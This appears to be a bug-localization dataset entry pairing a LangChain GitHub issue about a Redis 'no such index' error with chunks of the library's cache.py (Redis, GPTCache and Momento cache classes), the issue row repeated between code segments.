def __init__(self, redis_: Any, *, ttl: Optional[int] = None):
"""
Initialize an instance of RedisCache.
This method initializes an object with Redis caching capabilities.
It takes a `redis_` parameter, which should be an instance of a Redis
client class, allowing the object to interact with a Redis
server for caching purposes.
Parameters:
redis_ (Any): An instance of a Redis client class
(e.g., redis.Redis) used for caching.
This allows the object to communicate with a
Redis server for caching operations.
ttl (int, optional): Time-to-live (TTL) for cached items in seconds.
If provided, it sets the time duration for how long cached
items will remain valid. If not provided, cached items will not
have an automatic expiration.
"""
try:
from redis import Redis
except ImportError:
raise ValueError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
)
if not isinstance(redis_, Redis):
raise ValueError("Please pass in Redis object.")
self.redis = redis_
self.ttl = ttl
def _key(self, prompt: str, llm_string: str) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Compute key from prompt and llm_string"""
return _hash(prompt + llm_string)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
generations = []
results = self.redis.hgetall(self._key(prompt, llm_string))
if results:
for _, text in results.items():
try:
generations.append(loads(text))
except Exception:
logger.warning(
"Retrieving a cache value that could not be deserialized "
"properly. This is likely due to the cache being in an "
"older format. Please recreate your cache to avoid this "
"error."
)
generations.append(Generation(text=text))
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Update cache based on prompt and llm_string."""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"RedisCache only supports caching of normal LLM generations, "
f"got {type(gen)}"
)
key = self._key(prompt, llm_string)
with self.redis.pipeline() as pipe:
pipe.hset(
key,
mapping={
str(idx): dumps(generation)
for idx, generation in enumerate(return_val)
},
)
if self.ttl is not None:
pipe.expire(key, self.ttl)
pipe.execute()
def clear(self, **kwargs: Any) -> None:
"""Clear cache. If `asynchronous` is True, flush asynchronously."""
asynchronous = kwargs.get("asynchronous", False)
self.redis.flushdb(asynchronous=asynchronous, **kwargs)
class RedisSemanticCache(BaseCache): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Cache that uses Redis as a vector-store backend."""
DEFAULT_SCHEMA = {
"content_key": "prompt",
"text": [
{"name": "prompt"},
],
"extra": [{"name": "return_val"}, {"name": "llm_string"}],
}
def __init__( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | self, redis_url: str, embedding: Embeddings, score_threshold: float = 0.2
):
"""Initialize by passing in the `init` GPTCache func
Args:
redis_url (str): URL to connect to Redis.
embedding (Embedding): Embedding provider for semantic encoding and search.
score_threshold (float, 0.2):
Example:
.. code-block:: python
from langchain.globals import set_llm_cache
from langchain.cache import RedisSemanticCache
from langchain.embeddings import OpenAIEmbeddings
set_llm_cache(RedisSemanticCache(
redis_url="redis://localhost:6379",
embedding=OpenAIEmbeddings()
))
"""
self._cache_dict: Dict[str, RedisVectorstore] = {}
self.redis_url = redis_url
self.embedding = embedding
self.score_threshold = score_threshold
def _index_name(self, llm_string: str) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | hashed_index = _hash(llm_string)
return f"cache:{hashed_index}"
def _get_llm_cache(self, llm_string: str) -> RedisVectorstore:
index_name = self._index_name(llm_string)
if index_name in self._cache_dict:
return self._cache_dict[index_name]
try:
self._cache_dict[index_name] = RedisVectorstore.from_existing_index(
embedding=self.embedding,
index_name=index_name,
redis_url=self.redis_url,
schema=cast(Dict, self.DEFAULT_SCHEMA),
)
except ValueError:
redis = RedisVectorstore(
embedding=self.embedding,
index_name=index_name,
redis_url=self.redis_url,
index_schema=cast(Dict, self.DEFAULT_SCHEMA),
)
_embedding = self.embedding.embed_query(text="test")
redis._create_index(dim=len(_embedding))
self._cache_dict[index_name] = redis
return self._cache_dict[index_name]
def clear(self, **kwargs: Any) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Clear semantic cache for a given llm_string."""
index_name = self._index_name(kwargs["llm_string"])
if index_name in self._cache_dict:
self._cache_dict[index_name].drop_index(
index_name=index_name, delete_documents=True, redis_url=self.redis_url
)
del self._cache_dict[index_name]
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Look up based on prompt and llm_string."""
llm_cache = self._get_llm_cache(llm_string)
generations: List = []
results = llm_cache.similarity_search(
query=prompt,
k=1,
distance_threshold=self.score_threshold,
)
if results:
for document in results:
try:
generations.extend(loads(document.metadata["return_val"]))
except Exception:
logger.warning(
"Retrieving a cache value that could not be deserialized "
"properly. This is likely due to the cache being in an "
"older format. Please recreate your cache to avoid this "
"error."
)
generations.extend(
_load_generations_from_json(document.metadata["return_val"])
)
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Update cache based on prompt and llm_string."""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"RedisSemanticCache only supports caching of "
f"normal LLM generations, got {type(gen)}"
)
llm_cache = self._get_llm_cache(llm_string)
metadata = {
"llm_string": llm_string,
"prompt": prompt,
"return_val": dumps([g for g in return_val]),
}
llm_cache.add_texts(texts=[prompt], metadatas=[metadata])
class GPTCache(BaseCache):
"""Cache that uses GPTCache as a backend."""
def __init__(
self,
init_func: Union[
Callable[[Any, str], None], Callable[[Any], None], None
] = None,
):
"""Initialize by passing in init function (default: `None`).
Args:
init_func (Optional[Callable[[Any], None]]): init `GPTCache` function
(default: `None`)
Example: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | .. code-block:: python
# Initialize GPTCache with a custom init function
import gptcache
from gptcache.processor.pre import get_prompt
from gptcache.manager.factory import get_data_manager
from langchain.globals import set_llm_cache
# Avoid multiple caches using the same file,
causing different llm model caches to affect each other
def init_gptcache(cache_obj: gptcache.Cache, llm str):
cache_obj.init(
pre_embedding_func=get_prompt,
data_manager=manager_factory(
manager="map",
data_dir=f"map_cache_{llm}"
),
)
set_llm_cache(GPTCache(init_gptcache))
"""
try:
import gptcache
except ImportError:
raise ImportError(
"Could not import gptcache python package. "
"Please install it with `pip install gptcache`."
)
self.init_gptcache_func: Union[
Callable[[Any, str], None], Callable[[Any], None], None
] = init_func
self.gptcache_dict: Dict[str, Any] = {}
def _new_gptcache(self, llm_string: str) -> Any: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """New gptcache object"""
from gptcache import Cache
from gptcache.manager.factory import get_data_manager
from gptcache.processor.pre import get_prompt
_gptcache = Cache()
if self.init_gptcache_func is not None:
sig = inspect.signature(self.init_gptcache_func)
if len(sig.parameters) == 2:
self.init_gptcache_func(_gptcache, llm_string)
else:
self.init_gptcache_func(_gptcache)
else:
_gptcache.init(
pre_embedding_func=get_prompt,
data_manager=get_data_manager(data_path=llm_string),
)
self.gptcache_dict[llm_string] = _gptcache
return _gptcache
def _get_gptcache(self, llm_string: str) -> Any:
"""Get a cache object.
When the corresponding llm model cache does not exist, it will be created."""
_gptcache = self.gptcache_dict.get(llm_string, None)
if not _gptcache:
_gptcache = self._new_gptcache(llm_string)
return _gptcache
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Look up the cache data.
First, retrieve the corresponding cache object using the `llm_string` parameter,
and then retrieve the data from the cache based on the `prompt`.
"""
from gptcache.adapter.api import get
_gptcache = self._get_gptcache(llm_string)
res = get(prompt, cache_obj=_gptcache)
if res:
return [
Generation(**generation_dict) for generation_dict in json.loads(res)
]
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache.
First, retrieve the corresponding cache object using the `llm_string` parameter,
and then store the `prompt` and `return_val` in the cache object.
"""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"GPTCache only supports caching of normal LLM generations, "
f"got {type(gen)}"
)
from gptcache.adapter.api import put
_gptcache = self._get_gptcache(llm_string)
handled_data = json.dumps([generation.dict() for generation in return_val])
put(prompt, handled_data, cache_obj=_gptcache)
return None
def clear(self, **kwargs: Any) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Clear cache."""
from gptcache import Cache
for gptcache_instance in self.gptcache_dict.values():
gptcache_instance = cast(Cache, gptcache_instance)
gptcache_instance.flush()
self.gptcache_dict.clear()
def _ensure_cache_exists(cache_client: momento.CacheClient, cache_name: str) -> None:
"""Create cache if it doesn't exist.
Raises:
SdkException: Momento service or network error
Exception: Unexpected response
"""
from momento.responses import CreateCache
create_cache_response = cache_client.create_cache(cache_name)
if isinstance(create_cache_response, CreateCache.Success) or isinstance(
create_cache_response, CreateCache.CacheAlreadyExists
):
return None
elif isinstance(create_cache_response, CreateCache.Error):
raise create_cache_response.inner_exception
else:
raise Exception(f"Unexpected response cache creation: {create_cache_response}")
def _validate_ttl(ttl: Optional[timedelta]) -> None:
if ttl is not None and ttl <= timedelta(seconds=0):
raise ValueError(f"ttl must be positive but was {ttl}.")
class MomentoCache(BaseCache): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Cache that uses Momento as a backend. See https://gomomento.com/"""
def __init__(
self,
cache_client: momento.CacheClient,
cache_name: str,
*,
ttl: Optional[timedelta] = None,
ensure_cache_exists: bool = True,
):
"""Instantiate a prompt cache using Momento as a backend.
Note: to instantiate the cache client passed to MomentoCache, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | you must have a Momento account. See https://gomomento.com/.
Args:
cache_client (CacheClient): The Momento cache client.
cache_name (str): The name of the cache to use to store the data.
ttl (Optional[timedelta], optional): The time to live for the cache items.
Defaults to None, ie use the client default TTL.
ensure_cache_exists (bool, optional): Create the cache if it doesn't
exist. Defaults to True.
Raises:
ImportError: Momento python package is not installed.
TypeError: cache_client is not of type momento.CacheClientObject
ValueError: ttl is non-null and non-negative
"""
try:
from momento import CacheClient
except ImportError:
raise ImportError(
"Could not import momento python package. "
"Please install it with `pip install momento`."
)
if not isinstance(cache_client, CacheClient):
raise TypeError("cache_client must be a momento.CacheClient object.")
_validate_ttl(ttl)
if ensure_cache_exists:
_ensure_cache_exists(cache_client, cache_name)
self.cache_client = cache_client
self.cache_name = cache_name
self.ttl = ttl
@classmethod
def from_client_params( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
